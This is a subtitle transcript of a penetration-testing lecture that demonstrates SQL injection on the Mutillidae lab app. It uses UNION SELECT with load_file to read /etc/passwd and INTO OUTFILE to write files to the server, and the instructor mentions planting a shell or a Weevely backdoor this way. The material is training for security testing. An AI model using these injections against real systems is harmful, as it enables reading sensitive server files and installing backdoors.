1
1

00:00:01,937  -->  00:00:03,080
<v Instructor>In this lecture,</v>
2

2

00:00:03,080  -->  00:00:06,490
I'd like to show you how we can use SQL injections
3

3

00:00:06,490  -->  00:00:08,900
to read any file in the server
4

4

00:00:08,900  -->  00:00:12,370
so even if the file exists outside the www root,
5

5

00:00:12,370  -->  00:00:14,360
we'll be able to read it exactly
6

6

00:00:14,360  -->  00:00:16,970
like a file disclosure vulnerability
7

7

00:00:16,970  -->  00:00:19,160
and we'll also see how we can use it
8

8

00:00:19,160  -->  00:00:22,110
to write files and upload them to the system
9

9

00:00:22,110  -->  00:00:25,050
just like a file upload vulnerability.
10

10

00:00:25,050  -->  00:00:27,730
So the first thing we're going to have a look at
11

11

00:00:27,730  -->  00:00:29,773
is the reading the file.
12

12

00:00:30,610  -->  00:00:32,410
And I'm gonna set everything to null here.
13

13

00:00:32,410  -->  00:00:34,050
So I have my statement here
14

14

00:00:34,050  -->  00:00:36,010
and I'm gonna set select one,
15

15

00:00:36,010  -->  00:00:37,120
and I'm gonna leave number two
16

16

00:00:37,120  -->  00:00:39,340
'cause I'm gonna do stuff on that.
17

17

00:00:39,340  -->  00:00:42,530
And we're gonna do another three nulls here.
18

18

00:00:42,530  -->  00:00:44,023
So null,
19

19

00:00:46,120  -->  00:00:47,680
null,
20

20

00:00:47,680  -->  00:00:48,513
null.
21

21

00:00:48,513  -->  00:00:51,440
So we have select null something null, null, null.
22

22

00:00:51,440  -->  00:00:54,040
So five because we have five records
23

23

00:00:54,040  -->  00:00:56,240
when we did the order by.
24

24

00:00:56,240  -->  00:00:58,910
And instead of selecting something,
25

25

00:00:58,910  -->  00:01:00,490
remember, in the third video,
26

26

00:01:00,490  -->  00:01:04,330
we did select database, for example,
27

27

00:01:04,330  -->  00:01:06,370
and it shows us the current database.
28

28

00:01:06,370  -->  00:01:07,250
What I wanna do now
29

29

00:01:07,250  -->  00:01:09,270
is I wanna do another function
30

30

00:01:09,270  -->  00:01:11,170
and that function is called load_file.
31

31

00:01:15,190  -->  00:01:18,010
And in here, I'm gonna set the file
32

32

00:01:18,010  -->  00:01:20,910
that I wanna load and I'm gonna use the same file
33

33

00:01:20,910  -->  00:01:21,890
that we had the look on
34

34

00:01:21,890  -->  00:01:24,350
in the file inclusion vulnerability
35

35

00:01:24,350  -->  00:01:27,663
and it was etc/passwd.
36

36

00:01:28,830  -->  00:01:30,800
So we're trying to read that file
37

37

00:01:30,800  -->  00:01:35,670
and our statement is union select that file and that's it.
38

38

00:01:35,670  -->  00:01:37,003
So I'm gonna copy this.
39

39

00:01:38,230  -->  00:01:39,840
And I'm gonna inject it here
40

40

00:01:39,840  -->  00:01:42,190
and I'm gonna add my %23
41

41

00:01:42,190  -->  00:01:44,533
which is my command.
42

42

00:01:47,770  -->  00:01:49,050
And as you can see,
43

43

00:01:49,050  -->  00:01:51,410
we managed to read all the information,
44

44

00:01:51,410  -->  00:01:54,570
all the content of etc/passwd
45

45

00:01:55,450  -->  00:01:57,210
even though it's not in the web root.
46

46

00:01:57,210  -->  00:01:58,960
So it's stored in etc/passwd.
47

47

00:01:58,960  -->  00:02:01,360
So we can read anything in the server
48

48

00:02:01,360  -->  00:02:02,420
from other websites,
49

49

00:02:02,420  -->  00:02:04,580
from other files anywhere in the server,
50

50

00:02:04,580  -->  00:02:05,510
we can read it
51

51

00:02:05,510  -->  00:02:08,063
by specifying the full path of that file.
52

52

00:02:10,260  -->  00:02:12,010
The next thing I'd like to show you
53

53

00:02:13,000  -->  00:02:15,380
is writing to the server.
54

54

00:02:15,380  -->  00:02:17,540
So we're actually going to write stuff
55

55

00:02:17,540  -->  00:02:19,350
to the server and this is very useful
56

56

00:02:19,350  -->  00:02:23,110
because you'd be able to write any code you want,
57

57

00:02:23,110  -->  00:02:26,850
so for example, you can write the code for a PHP script,
58

58

00:02:26,850  -->  00:02:30,691
you can write a code of a shell, a virus
59

59

00:02:30,691  -->  00:02:33,560
or a PHP code to get other connections to you.
60

60

00:02:33,560  -->  00:02:35,030
So it'll basically just act
61

61

00:02:35,030  -->  00:02:37,870
like a file upload vulnerability.
62

62

00:02:37,870  -->  00:02:39,040
And to do that,
63

63

00:02:39,040  -->  00:02:41,340
I'm going to write the code that I want to do here
64

64

00:02:41,340  -->  00:02:43,100
and I'm gonna call that, for example,
65

65

00:02:43,100  -->  00:02:46,053
just example example.
66

66

00:02:47,490  -->  00:02:51,950
And we're going to use a function called outfile
67

67

00:02:51,950  -->  00:02:53,867
so we're gonna do into outfile
68

68

00:02:55,740  -->  00:02:57,420
and then we're gonna specify
69

69

00:02:57,420  -->  00:02:59,610
where we want to store that file.
70

70

00:02:59,610  -->  00:03:01,480
Now, in best case scenarios,
71

71

00:03:01,480  -->  00:03:04,210
you'd be able to write to your web root
72

72

00:03:04,210  -->  00:03:06,740
and that will mean that you can access the file
73

73

00:03:06,740  -->  00:03:08,690
through the browser and execute it,
74

74

00:03:08,690  -->  00:03:11,610
so you can upload a Weevely file
75

75

00:03:11,610  -->  00:03:12,750
and then connect to it
76

76

00:03:12,750  -->  00:03:14,530
and do stuff like that.
77

77

00:03:14,530  -->  00:03:16,120
So let's try to do that first.
78

78

00:03:16,120  -->  00:03:20,350
So we're gonna do it in var/www
79

79

00:03:20,350  -->  00:03:22,730
and that's our web root so we'll be able
80

80

00:03:22,730  -->  00:03:24,010
to access things through it
81

81

00:03:24,010  -->  00:03:27,640
or you can put it even var/www
82

82

00:03:27,640  -->  00:03:29,260
and then put mutillidae after it
83

83

00:03:30,820  -->  00:03:32,233
to store it in there.
84

84

00:03:34,190  -->  00:03:35,470
So the command is very simple.
85

85

00:03:35,470  -->  00:03:36,940
Again union select.
86

86

00:03:36,940  -->  00:03:38,460
Make sure you set everything to null
87

87

00:03:38,460  -->  00:03:41,160
so that nothing gets written to the file
88

88

00:03:41,160  -->  00:03:42,670
except what you put in here
89

89

00:03:42,670  -->  00:03:44,730
and I put example example
90

90

00:03:44,730  -->  00:03:47,050
and it's gonna be stored into our file
91

91

00:03:47,050  -->  00:03:49,520
in var/www/mutillidae
92

92

00:03:49,520  -->  00:03:53,137
and recall that example.txt.
93

93

00:03:57,540  -->  00:03:59,733
Let's try to run this and see if it works.
94

94

00:04:12,630  -->  00:04:14,390
Now, this didn't work.
95

95

00:04:14,390  -->  00:04:15,800
And if you come down here,
96

96

00:04:15,800  -->  00:04:20,477
you'll see that SQL or MySQL
97

97

00:04:20,477  -->  00:04:24,330
is not allowed to create or write to this directory.
98

98

00:04:24,330  -->  00:04:26,550
So the problem is we're not,
99

99

00:04:26,550  -->  00:04:28,420
the permissions that we have
100

100

00:04:28,420  -->  00:04:32,830
don't allow us to write to this particular location.
101

101

00:04:32,830  -->  00:04:34,410
So just to test this exploit,
102

102

00:04:34,410  -->  00:04:37,690
I'm going to change this location to tmp
103

103

00:04:37,690  -->  00:04:38,660
which is the temp
104

104

00:04:39,510  -->  00:04:42,150
and you'll see that you can actually write to temp
105

105

00:04:42,150  -->  00:04:43,983
so in real life in scenarios,
106

106

00:04:43,983  -->  00:04:46,300
it depends, you can try it and see if you're able
107

107

00:04:46,300  -->  00:04:48,080
to write stuff or not.
108

108

00:04:48,080  -->  00:04:50,770
In this, we're trying to write to temp now
109

109

00:04:50,770  -->  00:04:52,163
and if we read in temp,
110

110

00:04:54,030  -->  00:04:55,610
if we clear that
111

111

00:04:55,610  -->  00:05:00,023
and then ls and /tmp
112

112

00:05:02,370  -->  00:05:04,720
you'll see that we have something called example
113

113

00:05:04,720  -->  00:05:07,020
and if you try to read that,
114

114

00:05:07,020  -->  00:05:10,030
you'll see that it contains,
115

115

00:05:10,030  -->  00:05:11,060
obviously it contains
116

116

00:05:11,060  -->  00:05:13,770
the content of what we did before
117

117

00:05:13,770  -->  00:05:18,060
which was the normal selection that you'd see.
118

118

00:05:18,060  -->  00:05:22,170
So what you see for putting the stuff for admin
119

119

00:05:22,170  -->  00:05:24,350
and then it showed us what's in there
120

120

00:05:24,350  -->  00:05:26,090
which is example example
121

121

00:05:26,090  -->  00:05:28,523
which is what we wanted to write to the file.
122

122

00:05:32,070  -->  00:05:33,970
Now you can obviously get rid of the admin
123

123

00:05:33,970  -->  00:05:35,450
and the adminpass stuff
124

124

00:05:35,450  -->  00:05:37,290
by just putting a wrong username
125

125

00:05:37,290  -->  00:05:39,410
and nothing's gonna be displayed here
126

126

00:05:39,410  -->  00:05:42,040
so the only thing that you'll see is the output
127

127

00:05:42,040  -->  00:05:45,290
which is example example.
128

128

00:05:45,290  -->  00:05:47,370
But again, this is only useful
129

129

00:05:47,370  -->  00:05:50,270
if you're able to write to your web server,
130

130

00:05:50,270  -->  00:05:51,850
so you can access it
131

131

00:05:51,850  -->  00:05:53,090
and then use your shell
132

132

00:05:53,090  -->  00:05:56,903
or use your payload and further exploit the system.